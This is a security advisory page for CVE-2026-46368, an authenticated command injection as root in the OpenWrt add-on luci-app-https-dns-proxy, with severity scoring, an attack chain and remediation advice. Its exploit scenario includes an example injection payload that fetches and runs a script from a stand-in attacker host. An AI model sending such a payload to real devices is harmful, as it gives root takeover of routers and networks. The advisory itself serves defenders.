Skip to main content

luci-app-https-dns-proxy CVE-2026-46368

| EUVD-2026-31836 HIGH
Command Injection (CWE-77)
2026-05-26 VulnCheck GHSA-crmc-hfvp-6m66
Command Injection Luci App Https Dns Proxy
8.7
CVSS 4.0 · NVD
Share

Severity by source

NVD PRIMARY
8.7 HIGH
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
X

Lifecycle Timeline

2
Analysis Generated
Jun 08, 2026 - 10:02 vuln.today
CVSS changed
May 26, 2026 - 15:22 NVD
8.8 (HIGH) 8.7 (HIGH)

DescriptionCVE.org

luci-app-https-dns-proxy through 2025.12.29-5 - an optional LuCI web UI add-on for the https-dns-proxy package, distributed through the OpenWrt community packages feed and not installed by default - contains a command injection vulnerability in the setInitAction function. An authenticated user holding the luci.https-dns-proxy ACL permission can inject shell metacharacters through the 'name' parameter of a ubus RPC call to luci.https-dns-proxy setInitAction, resulting in arbitrary command execution as root on the underlying device. Core OpenWrt is not affected; only installations that have opted in to the luci-app-https-dns-proxy package are vulnerable.

AnalysisAI

Authenticated command injection in luci-app-https-dns-proxy through version 2025.12.29-5 allows a low-privileged LuCI user holding the luci.https-dns-proxy ACL permission to execute arbitrary commands as root on OpenWrt devices via shell metacharacters in the 'name' parameter of a ubus RPC call to setInitAction. Publicly available exploit code exists (Exploit-DB 52521, VulnCheck advisory), though EPSS remains low at 0.06% and the package is an optional community add-on not installed by default. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Obtain LuCI credentials with luci.https-dns-proxy ACL
Delivery
Reach LuCI/ubus endpoint over network
Exploit
Send ubus RPC setInitAction with malicious 'name'
Execution
Shell metacharacters injected into init command
Persist
Arbitrary command executes as root
Impact
Install persistence and pivot into LAN
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Requires (1) the optional luci-app-https-dns-proxy package from the OpenWrt community feed to be installed - it is not present in default OpenWrt builds; (2) the LuCI web interface and ubus RPC endpoint to be reachable from the attacker's network position (typically LAN by default, WAN only if the administrator has explicitly exposed it); and (3) valid LuCI credentials whose role grants the luci.https-dns-proxy ACL permission, as confirmed by CVSS PR:L. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H) yields 8.7 - network-reachable, low complexity, requiring low privileges (an authenticated LuCI user with the specific ACL), no user interaction, with total confidentiality, integrity, and availability impact on the vulnerable component. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who has obtained a low-privileged LuCI account with the luci.https-dns-proxy ACL - for example, a delegated network operator, a guest admin on a shared router, or credentials harvested via phishing or reuse - connects to the LuCI web interface and issues a ubus RPC call to luci.https-dns-proxy setInitAction with a 'name' parameter containing shell metacharacters such as `;wget http://attacker/x -O- | sh;`. The ubus handler concatenates the value into a shell invocation, and the injected command executes as root, giving the attacker full control of the OpenWrt device including persistence, traffic interception, and lateral pivot into the LAN. …
Remediation Upstream fix available via the project repository at https://github.com/stangri/luci-app-https-dns-proxy; a released patched version newer than 2025.12.29-5 is not independently confirmed from the provided data, so administrators should pull the latest release from the community feed (opkg update && opkg upgrade luci-app-https-dns-proxy) once a tagged build above 2025.12.29-5 is published, and verify against the VulnCheck advisory at https://www.vulncheck.com/advisories/luci-app-https-dns-proxy-authenticated-command-injection-via-setinitaction. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

Within 24 hours: Inventory all OpenWrt deployments to identify systems with luci-app-https-dns-proxy installed and determine which users hold the luci.https-dns-proxy ACL permission. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-46368 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy